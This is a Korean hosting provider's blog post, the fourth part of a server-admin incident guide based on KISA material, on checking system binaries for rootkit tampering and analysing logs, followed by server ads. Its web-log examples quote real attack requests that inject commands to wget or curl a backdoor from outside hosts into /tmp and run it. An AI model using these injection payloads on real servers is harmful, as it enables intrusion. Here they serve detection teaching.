안녕하세요.
이호스트데이터센터입니다.
홍콩, 일본서버호스팅 운영자 분들을 위한 가이드 4탄! 해외 서버 운영자및 서버호스팅 관리자 분들은 꼭 읽으셨으면 좋겠네요^^
지난 피싱대응 가이트 1,2,3탄에 이어 계속 포스팅하도록 하겠습니다.
오늘은 시스템 프로그램 파일 변조 점검, 로그분석에 대한 포스팅을 하도록 하겠습니다.
참고로 참고로 아래 내용은 한국인터넷 진흥원에서 배포하는 피싱 가이드에서 발췌한 내용입니다.
* 시스템 프로그램 파일 변조 점검
루트킷에 의해 변조되는 경우를 포함하여 Trojan으로 자주 변경되는 시스템 파일들과 의심스러운 파일들이 점검대상이 되는데, 자동화된 프로그램 인 chkrootkit이나 RootkitHunter을 이용하면 쉽게 점검할 수 있습니다.
또는 다음과 같이 수작업으로도 확인 가능합니다.
[ system call 추적 ]
[root@localhost var]# strace -e trace=open ps
open“( /etc/ld.so.preload”, O_RDONLY) = -1 ENOENT (No such file or
directory)
open“( /etc/ld.so.cache”, O_RDONLY) = 3
open“( /lib/i686/libc.so.6”, O_RDONLY) = 3
open“( /dev/ttyop”, O_RDONLY) = 3
[ 파일의 무결성 검사 ]
RedHat계열의 경우 rpm커맨드를 이용해 파일 변경여부 점검가능
#rpm -V fileutils ← 패키지명
.M....G. /bin/df
S.5...GT /bin/ls
S.5....T c /etc/profile.d/colorls.sh
..5...GT /usr/bin/dir
[ 결과보기 ]
s : 프로그램의 사이즈가 변경, 5 : md5 checksum 값이 변경
T : 파일의 mtime 값이 변경
<참고 : 변경된 바이너리 복구방법 중 하나 - 포함된 패키지 강제설치>
- 변경된 바이너리가 포함된 패키지명 확인: #rpm -qf 바이너리명
예) [root@jjgosi board]# rpm -qf /bin/ps
procps-2.0.7-8
- 강제 재설치 : # rpm -Uhv --force procps-2.0.7-8.rpm
* 로그 분석
접속자의 IP나 요청한 서비스의 성공여부, 시스템의 운영상 장애 등 로그를 통해 파악할 수 있는 사항은 많습니다. 관리자가 수동으로 로그파일을 분석하여 필요한 정보를 추출하는 방법은 로그분석 툴 보다 다양한 정보를 획득할 수 있고, 로그분석 툴을 이용하면 사람의 수작업보다 좀 더 신속하고 정확할 수 있다는 장단점이 있습니다.
그러나 공격에 성공하여 권한을 획득하면 로그 삭제 또는 변조했을 가능성이 크기 때문에 로그를 100%로 신뢰할 수는 없습니다.
[ .bash_history 로그 ]
bash 쉘을 이용하는 경우 사용자가 시스템에서 실행시킨 명령어가 모두
.bash_history 파일에 기록되므로, root나 최근 추가된 계정 등 의심스러
운 계정의 .bash_history 파일을 분석
[ 웹 access_log 로그 ]
최근 웹 어플리케이션 취약점을 이용해 웹서버 실행권한인 nobody나 apache 또는 daemon 등의 권한을 획득한 뒤 nobody 등의 권한으로 파일 업로드 및 실행이 가능한 /tmp, /var/tmp, /dev/shm 등의 디렉토리에 파일을 다운로드 받아 실행하는 형태의 사고가 많이 발생하고 있습니다.
Apache 디폴트 access_log Format : “%h%l%u%t\”%r\”%>s%b”
h : remote Host l : logname u : user t : time
r : Firstline of request s : status b : byte sent
예) 제로보드 취약점 공격로그
print_category.php 파일의 injection 취약점을 이용해 백도어 프로그램(r0nin)을 /tmp 디렉토리에 업로드한 뒤 실행권한을 부여해 실행
/zboard/include/print_category.php?setup
=1&dir=http://www.~중략.com.xx/newcmd.gif?&cmd
=cd%20/tmp%20;%20wget%20http://nickvicq.xxx.net/BD/r0nin
HTTP/1.1”200 4892
/zboard/include/print_category.php?setup
=1&dir=http://www.~중략.com.br/newcmd.gif?&cmd
=cd%20/tmp%20;%20chmod%20777%20r0nin%20;%20./r0nin HTTP/1.1”
200 4204
access_log.1:xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] “GET
/cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_
BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;
cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl%20xxx.jinonet.
ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21 | HTTP/1.1”200 0
[ messages, secure 로그 ]
허가되지 않는 사용자가 원격에서 접속한 서비스(데몬)와 IP를 확인하고 접속성공(공격성공) 여부를 확인하는데도 도움이 됩니다.
예) 중국 IP로부터 8월 6일 10시 22분경 map, rpc 등 시스템에서 가지고 있을 법하거나 쉬운 패스워드를 사용하는 계정을 brute force공격(무작위로 대입)하여 몇 분 동안 ssh 접속시도 로그가 수십여 라인의 로그가 남겨짐
Aug 6 10:22:30 test sshd[7939]: Could not reverse map address
60.18.161.58
Aug 6 10:22:32 test sshd[7939]: Failed password for rpc from
60.18.161.58 port 28804 ssh2
~ 이하 생략
[ xferlog 로그 ]
FTP를 이용해 송수신한 파일명, 원격호스트, 전송방향, 접근모드, 사용자 계정 등의 정보를 확인할 수 있습니다.
예) 원격 호스트 test.abc.com에 ftp서비스로 접속하여 /home/test로 파일사이즈 가 14859인 tool.tar 파일 다운로드 한 로그
Sat Apr 21 00:53:44 2005 1 test.abc.com 14859 /home/test/tool.tar b _o r root ftp 0 *
[ last 로그 ]
last 명령어를 이용하면 해당 서버를 이용하는 각 계정 사용자들의 서버에 접속한 시간과 IP주소를 확인할 수 있습니다.
last에서 보이는 것은 ftp나 telnet, ssh 등 인증 후 접속에 성공한 로그만 남게 된다는 점을 주의해야 합니다. 또한 last에서 보이는 로그는 현재 속한 달의 로그만 보이게 되므로 지난달의 last 로그를 보려면 # last -f/var/log/wtmp.1과 같이 실행하면 됩니다.
보다 안정적이고 빠른 일본,홍콩 서버를 원하신다면 정답은 이호스트에 있습니다.
해외 서버호스팅은 역시 이호스트에 정답이 있습니다.
(일본, 홍콩,러시아,네덜란드,싱가포르,미국 - LA)
궁금하신 사항이나 문의 하실 내용 있으시면 언제든 아래 연락처로 문의 주시면 됩니다.
언제나 상담은 환영입니다~^^
감사합니다.
서비스 문의.
전화 : 070-7600-5521
메일 : jsyoon@ehostidc.co.kr
스카이프 : EhostIDC Hosting Manager
* 일본 서버호스팅
Intel® Xeon® Quad Core L5520 x 2CPU
24GB DDR RAM
1TB SATA3 HDD raid 1 구성.
Intel® Xeon® Quad Core E3 1230 v2
8GB DDR RAM
1TB SATA3 HDD raid 1 구성.
* 홍콩 서버호스팅
Intel Xeon E3-1230Lv3 Core / CPU Speed : 8 x 2.8GHz
RAM : 8GB
HDD-1 ≫ 1TB SATA AS HDD-2 ≫ 1TB SATA AS
RAID Support : Raid 1
Intel Xeon E3-1230Lv3 Core / CPU Speed : 8 x 2.8GHz
RAM : 8GB
HDD-1 ≫ 256 SSD
Intel Xeon E3-1230Lv3 Core / CPU Speed : 8 x 2.8GHz
RAM : 8GB
HDD-1 ≫ 480 SSD
Intel Xeon E3-1230Lv3 Core / CPU Speed : 8 x 2.8GHz
RAM : 8GB
HDD-1 ≫ 256 SSD HDD-2 ≫ 256 SSD
Intel Xeon E3-1230Lv3 Core / CPU Speed : 8 x 2.8GHz
RAM : 8GB
HDD-1 ≫ 480 SSD HDD-2 ≫ 480 SSD
* 러시아 서버호스팅
CPU : core i3-4360 2x3.7GHz
RAM : 4G (32GB 확장가능)
HDD : 100G ssd*2 (12 disk 확장 가능)
CPU : E3-1230v3 3.3GHz
RAM : 16G (32GB 확장가능)
HDD : 100G ssd*2 (12 disk 확장 가능)
CPU : E5-2620v3 2.4GHz
RAM : 16G (256GB 확장가능)
HDD : 100G ssd*2 (12 disk 확장 가능)
* 네덜란드 서버호스팅
CPU : Core i3-2100 3.1GHz (2xCores)
RAM : 4GB DDR3
HDD : 2x500GB SATA
etc : IPMI, 100Mbps
CPU : Intel Xeon E3-1230v3 3.6GHz (4xCores),
RAM : 16GB DDR3,
HDD : 2x1000GB SATA3
etc : IPMI, 100Mbps
CPU : Intel Xeon E5-1650 3,5GHz 6 Сores - 2xHDD
RAM : 16 to 128 GB DDR3 ECC RAM
HDD : SSD or 500GB/3TB SATA 7200
'[Global Services] > Asia IDC' 카테고리의 다른 글
| 이호스트 IDC 한국 및 해외(일본,홍콩) 서버호스팅 디도스 방어 보안망 구축!! (0) | 2015.12.10 |
|---|---|
| 이호스트IDC의 강점 해외(일본,홍콩)서버 호스팅 (0) | 2015.12.03 |
| 홍콩, 일본 서버 관리자를 위한 피싱대응 가이드 제 3탄~!! 백도어 점검 (0) | 2015.08.27 |
| 홍콩, 일본 서버 관리자를 위한 피싱대응 가이드 제 2탄~!! (0) | 2015.08.27 |
| 홍콩, 일본 서버 관리자를 위한 피싱대응 가이드 제 1탄~!! (0) | 2015.08.27 |